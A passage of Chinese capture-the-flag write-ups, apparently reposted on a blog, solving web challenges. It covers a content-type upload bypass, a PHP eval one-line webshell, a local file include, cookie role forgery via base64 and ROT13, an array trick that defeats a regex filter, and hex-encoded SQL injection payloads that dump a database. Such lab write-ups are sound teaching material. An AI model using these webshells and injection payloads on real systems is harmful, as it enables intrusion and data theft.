  2498. PGh0bWw+DQo8aGVhZD48bWV0YSBjaGFyc2V0PSJ1dGYtOCIgLz4NCjx0aXRsZT5VcGxvYWQ8L3RpdGxlPg0KPC9oZWFkPg0KDQo8Ym9keT4NCjxoMT7lm77niYfkuIrkvKA8L2gxPg0KDQo8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4NCiAgICA8bGFiZWwgZm9yPSJmaWxlIj5GaWxlbmFtZTo8L2xhYmVsPg0KICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImRpciIgdmFsdWU9Ii91cGxvYWRzLyIgLz4NCiAgICA8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgaWQ9ImZpbGUiIC8+DQogICAgPGJyIC8+DQogICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ic3VibWl0IiB2YWx1ZT0iU3VibWl0IiAvPg0KPC9mb3JtPg0KPCEtLSANCmluY2x1ZGUoJF9HRVRbJ2ZpbGUnXSk7IA0KLS0+DQoNCjw/cGhwDQoNCmluY2x1ZGUoJF9HRVRbJ2ZpbGUnXSk7IA0KQCRwaWMgPSAkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXTsNCkAkcGljcyA9IGV4cGxvZGUoJy4nICwgJHBpYyk7DQoNCmlmKEBpc3NldCgkX1BPU1Rbc3VibWl0XSkpew0KICAgIGlmICgoKCRfRklMRVNbImZpbGUiXVsidHlwZSJdID09ICJpbWFnZS9naWYiKQ0KICAgICAgICAgICAgfHwgKCRfRklMRVNbImZpbGUiXVsidHlwZSJdID09ICJpbWFnZS9qcGVnIikNCiAgICAgICAgICAgIHx8ICgkX0ZJTEVTWyJmaWxlIl1bInR5cGUiXSA9PSAiaW1hZ2UvcGpwZWciKSkpew0KDQogICAgICAgIGlmICgkX0ZJTEVTWyJmaWxlIl1bImVycm9yIl0gPiAwKXsNCiAgICAgICAgICAgIGVjaG8gIlJldHVybiBDb2RlOiAiIC4gJF9GSUxFU1siZmlsZSJdWyJlcnJvciJdIC4gIjxiciAvPiI7DQogICAgICAgIH1lbHNlew0KICAgICAgICAgICAgZWNobyAiVXBsb2FkOiAiIC4gJF9GSUxFU1siZmlsZSJdWyJuYW1lIl0gLiAiPGJyIC8+IjsNCiAgICAgICAgICAgIGVjaG8gIlR5cGU6ICIgLiAkX0ZJTEVTWyJmaWxlIl1bInR5cGUiXSAuICI8YnIgLz4iOw0KICAgICAgICAgICAgZWNobyAiU2l6ZTogIiAuICgkX0ZJTEVTWyJmaWxlIl1bInNpemUiXSAvIDEwMjQpIC4gIiBLYjxiciAvPiI7DQogICAgICAgICAgICAvL2VjaG8gIlRlbXAgZmlsZTogIiAuICRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSAuICI8YnIgLz4iOw0KICAgICAgICAgICAgaWYgKGZpbGVfZXhpc3RzKCJ1cGxvYWQvIiAuICRfRklMRVNbImZpbGUiXVsibmFtZSJdKSl7DQogICAgICAgICAgICAgICAgZWNobyAkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSAuICIgYWxyZWFkeSBleGlzdHMuICI7DQogICAgICAgICAgICB9ZWxzZXsNCiAgICAgICAgICAgICAgICBtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLA0KICAgICAgICAgICAgICAgICAgICAidXBsb2FkLyIgLiAkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSk7DQogICAgICAgICAgICAgICAgZWNobyAiU3RvcmVkIGluOiAiIC4gInVwbG9hZC8iIC4gJF9GSUxFU1siZmlsZSJdWyJuYW1lIl07DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9ZWxzZXsNCiAgICAgICAgZWNobyAiPHNjcmlwdD5hbGVydCgn5paH5Lu257G75Z6L5LiN5YWB6K64Jyk8L3NjcmlwdD4iOw0KICAgICAgICBlY2hvICJJbnZhbGlkIGZpbGUiOw0KICAgIH0NCn1lbHNlew0KICAgIC8vIGVjaG8gIkludmFsaWQgZmlsZSI7DQp9DQoNCj8+DQoNCjwvYm9keT4NCg0KPC9odG1sPg0K
  2499. base64解码后主要代码如下:
  2500. <?php
  2501. include($_GET['file']);
  2502. @$pic = $_FILES["file"]["name"];
  2503. @$pics = explode('.' , $pic);
  2504. if(@isset($_POST[submit])){
  2505.     if ((($_FILES["file"]["type"] == "image/gif")
  2506.             || ($_FILES["file"]["type"] == "image/jpeg")
  2507.             || ($_FILES["file"]["type"] == "image/pjpeg"))){
  2508.         if ($_FILES["file"]["error"] > 0){
  2509.             echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
  2510.         }else{
  2511.             echo "Upload: " . $_FILES["file"]["name"] . "<br />";
  2512.             echo "Type: " . $_FILES["file"]["type"] . "<br />";
  2513.             echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  2514.             //echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";
  2515.             if (file_exists("upload/" . $_FILES["file"]["name"])){
  2516.                 echo $_FILES["file"]["name"] . " already exists. ";
  2517.             }else{
  2518.                 move_uploaded_file($_FILES["file"]["tmp_name"],
  2519.                     "upload/" . $_FILES["file"]["name"]);
  2520.                 echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
  2521.             }
  2522.         }
  2523.     }else{
  2524.         echo "<script>alert('文件类型不允许')</script>";
  2525.         echo "Invalid file";
  2526.     }
  2527. }else{
  2528.     // echo "Invalid file";
  2529. }
  2530. ?>
  2531. 通过以上代码分析发现文件上传只是过滤了上传文件的type,通过修改content-type为image/jpeg或者image/gif即可上传 .
  2532. 尝试上传一句话图片木马,test.jpg,内容为一句话:<?php eval($_POST['cmd']); ?>
  2533. 通过buspuuti对其进行拦截,然后将test.jpg修改为test.php,发送请求,发现可以成功上传一句话图片后门文件,上传的存储路径为:upload/bk.php
  2534. 通过菜刀连接一句话,密码为cmd
  2535. https://25126d4501084fe195d203e9d30e4786cfdbb36527ac4d13.changame.ichunqiu.com/upload/test.php
  2536. 通过菜刀自带的虚拟命令终端的find命令来查找flag,并没有发现flag
  2537. find / -name "*flag*"
  2538. 查看config.php的源码,发现包含了数据库的连接信息
  2539. 得到:数据库用户名:ctf ,密码:ctfctfctf,数据库:ctf
  2540. 下面通过菜刀自带的数据库管理功能连接数据库,其数据库配置连接信息如下:
  2541. <H>localhost</H>
  2542. <U>ctf</U>
  2543. <P>ctfctfctf</P>
  2544. <L>utf8</L>
  2545. 通过查找到ctf数据库中的flag表中flag字段,然后执行语句,即可得到flag
  2546. 最终falg:
  2547. flag{0dc895ae-421e-47d8-83f9-a62f615d8509}
  2548. 题目名称:broken
  2549. 题目内容:
  2550. http://106.75.72.168:1111/
  2551. you got a file, but ...  
  2552. 题目writeup:
  2553. 启动题目场景,获得靶场网站,访问网站,网页内容显示,如果得到一个文件,其内容是已经被破坏了。
  2554. http://106.75.72.168:1111/
  2555. 点击file,可以发现这是一段jsfuck编码。
  2556. jsfuck的起源:在渗透测试时,js代码可能被关键词检测,于是作者考虑躲避关键词检测的想法,例如 eval等关键词.
  2557. http://www.jsfuck.com/
  2558. 按照常见的套路复制粘贴到控制台执行,执行成功后,发现异常。
  2559. 正常的jsfuck开头为[] (![]+[]),而我们的开头似乎少了一个]
  2560. 我们补全后再次运行
  2561. 显示flag is not here,很明显这是调用了函数显示出的弹窗,于是我们删除
  2562. 最后代表function调用的()查看代码,即可得到flag:
  2563. 最终flag:
  2564. flag{f_f_l_u_a_c_g_k}
  2565. 题目名称:who are you?
  2566. 题目内容:
  2567. http://106.75.72.168:2222/
  2568. 我是谁,我在哪,我要做什么
  2569. 题目writeup:
  2570. 直接访问,显示权限不够
  2571. X-Forwarded-For: 127.0.0.1
  2572. 在burp中重发,
  2573. 发现cookie中有一个名为role的数据(此时可以推断此题有90%的可能性与此有关)
  2574. cookie:role=Zjo1OiJ0aHJmZyI7
  2575. 将Zjo1OiJ0aHJmZyI7对其进行解密得到:
  2576. f:5:"thrfg";
  2577. f:5:"thrfg";看起来像是Rot13加密
  2578. 得到:
  2579. s:5:"guest";
  2580. 将guest改为admin,那么
  2581. s:5:"admin"; 进行Rot13加密后是: f:5:"nqzva";
  2582. http://www.mxcz.net/tools/rot13.aspx
  2583. 最后base64是
  2584. :Zjo1OiJucXp2YSI7
  2585. 得到:
  2586. <!-- $filename = $_POST['filename']; $data = $_POST['data']; -->Hello admin, now you can upload something you are easy to forget
  2587. 示要构造post方式上传filename和data。(有很多工具可以使用,如Firefox的hackbar插件和burpsuit)利用burpsuit抓包并修改为POST上传,添加 filename项和data项
  2588. filename=flag.php&data=<?php phpinfo();?>
  2589. 页面会报错"No No No!", 因为网页做了正则匹配过滤. 而用data[]=的方法,把data从字符串变成数组,可以绕过正则匹配的过滤。
  2590. 用data[]=的方法,把data从字符串变成数组,导致绕过正则匹配。上传之后能够发现它返回了文件的地址,访问它就得到flag
  2591. 发现回显为no no no,想到data可能是用一个数组存取的内容,抱着试试的想法将data改为data[]其他内容不变(filename和data的值不重要)。回显一个文件地址,将地址打开出现答案:flag{}
  2592. filename=flag.php&data=[]
  2593. 得到:
  2594. ./uploads/3de8e9b787288c751bf7b0291b028fbaflag.php
  2595. http://106.75.72.168:2222/uploads/3de8e9b787288c751bf7b0291b028fbaflag.php
  2596. <?php%20eval($_POST['cmd']);%20?>
  2597. 得到:
  2598. ./uploads/47013ce8d33835e50cd0f97565cb7172flag.php
  2599. http://106.75.72.168:2222/uploads/47013ce8d33835e50cd0f97565cb7172flag.php
  2600. 最终得到flag:
  2601. flag{e07cd440-8eed-11e7-997d-7efc09eb6c59}
  2602. 题目名称:phone number
  2603. 题目内容:
  2604. http://106.75.72.168:3333
  2605. Phone number is a good thing.
  2606. 题目writup:
  2607. 访问题目场景,发现是一个登陆页面,并查看源码无果。
  2608. http://106.75.72.168:3333/login.php
  2609. 这里按照正常流程,先注册一个账号:
  2610. 用户名bks,密码123456,手机号码:131288353391
  2611. 登录系统,点击check
  2612. 返回了信息:
  2613. There only 2 people use the same phone as you
  2614. 通过 f12元素审核查看源码,发现注释中显示"听说admin中的手机号码藏着秘密,告诉我们flag
  2615. 就在admin用户的phone字段.
  2616. 用户注册,尝试用户名和手机号码都加单引号,提示手机号码必须是数字
  2617. 联想到会不会服务端验证phone 用了is_number
  2618. 这里注册一个用户ss' ,密码123456,手机号码:hex(13128835391)为十六进制:0x3133313238383335333931
  2619. 果然如此,点击check,返回:db errror(sql错误)
  2620. 应该是有注入的,结合上文中的注释提示,应该是注入出admin的电话号码即可得到flag,所以phone应该是利用点,要想办法得到admin的phone。
  2621. 但是phone处只能输入数字,可以将sql语句转化为16进制。
  2622. 查询字段回显数:
  2623. 注册一个账号ts , 密码123456, 手机号码:hex(13128835391  order by 1 #)
  2624. 为十六进制:0x313331323838333533393120206F7264657220627920312023,并抓包发送请求包(手机号码字段前段有长度限制,这里用抓包拦截发送请求绕过前端手机号码长度限制)
  2625. 登录系统,点击check,返回:
  2626. There only 1 people use the same phone as you
  2627. 注册一个账号ts1 密码123456, 手机号码:hex(13128835391  order by 2 #)为十六进制:0x313331323838333533393120206F7264657220627920322023
  2628. 登录系统,点击check.返回:db error!
  2629. 说明字段只有一个字段位回显
  2630. 爆数据库名:
  2631. 注册一个账号ts2 密码123456, 手机号码:hex(13128835391  union select database()#)为十六进制:0x31333132383833353339312020756E696F6E2073656C656374206461746162617365282923
  2632. 登录系统,点击check.返回:
  2633. There only 3 people use the same phone as you
  2634. There only webdb people use the same phone as you
  2635. 得到数据库名为:webdb
  2636. 爆表名:
  2637. 注册一个账号ts3 密码123456, 手机号码:hex(13128835391  union select group_concat(table_name) from information_schema.tables where table_schema='webdb'#)为十六进制:
  2638. 0x31333132383833353339312020756E696F6E2073656C6563742067726F75705F636F6E636174287461626C655F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D613D2777656264622723
  2639. 登录系统,点击check.返回:
  2640. There only 4 people use the same phone as you
  2641. There only user people use the same phone as you
  2642. 得到表名user
  2643. 爆字段名:
  2644. 注册一个账号ts5 密码123456, 手机号码:hex(13128835391 union select group_concat(column_name) from information_schema.columns where table_name='user'#)为十六进制:
  2645. 0x313331323838333533393120756E696F6E2073656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D27757365722723
  2646. 登录系统,点击check.返回
  2647. There only 6 people use the same phone as you
  2648. There only Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,
  2649. File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,
  2650. Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routin people use the same phone as you
  2651. 得到字段名,有用的字段为:User,Password,id,username,phone
  2652. 爆字段内容
  2653. 根据注释中admin的电话藏着大秘密,我们查询username为admin的电话
  2654. 注册一个账号ts6 密码123456, 手机号码:hex(13128835391  union select phone from user where username='admin'#)为十六进制:
  2655. 0x31333132383833353339312020756E696F6E2073656C6563742070686F6E652066726F6D207573657220776865726520757365726E616D653D2761646D696E2723
  2656. 登录系统,点击check.返回
  2657. There only 7 people use the same phone as you
  2658. There only flag{6dd303b0-8fce-2396-9ad8-d9f7a72f84b0} people use the same phone as you
  2659. 最终,得到flag:
  2660. flag{6dd303b0-8fce-2396-9ad8-d9f7a72f84b0}
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/501753
推荐阅读
相关标签
  

闽ICP备14008679号

        
cppcmd=keepalive&